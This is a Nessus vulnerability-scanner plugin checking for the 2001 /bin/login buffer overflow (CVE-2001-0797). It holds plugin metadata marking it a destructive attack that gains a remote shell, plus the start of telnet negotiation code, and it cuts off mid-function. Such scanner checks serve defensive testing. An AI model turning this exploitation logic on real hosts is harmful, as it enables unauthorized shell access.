# # This plugin was written by Renaud Deraison and # is released under the GPL. It's redundant with plugin #10827, however # it allows us to quickly spot false positives and shows a sensitive # file to the user. desc = "There is a bug in the remote /bin/login which allows an attacker to gain a shell on this host, without even sending a shell code. An attacker may use this flaw to log in as any user (except root) on the remote host."; sol = "Solution : See http://www.cert.org/advisories/CA-2001-34.html Risk factor : High"; if (description) { script_id(11136); script_cve_id("CVE-2001-0797"); script_version("$Revision$"); script_bugtraq_id(3681); name["english"] = "/bin/login overflow exploitation"; script_name(english:name["english"]); descr = string(desc, "\n\n", sol); script_description(english:descr); summary["english"] = "Attempts to log into the remote host"; script_summary(english:summary["english"]); # It might cause problem on some systems script_category(ACT_DESTRUCTIVE_ATTACK); script_copyright(english:"This script is Copyright (C) 2002 Renaud Deraison"); family["english"] = "Gain a shell remotely"; script_family(english:family["english"]); script_dependencie("find_service.nes"); script_require_ports("Services/telnet", 23); exit(0); } function init() { send(socket:soc, data:raw_string( 0xFF, 252, 0x25, 0xFF, 254, 0x26, 0xFF, 252, 0x26, 0xFF, 254, 0x03, 0xFF, 252, 0x18, 0xFF, 252, 0x1F, 0xFF, 252, 0x20, 0xFF, 252, 0x21, 0xFF, 252, 0x22, 0xFF, 0xFB, 0x27, 0xFF, 254, 0x05, 0xFF, 252, 0x23)); r = recv(socket:soc, length:30); lim = strlen(r); for(i=0;i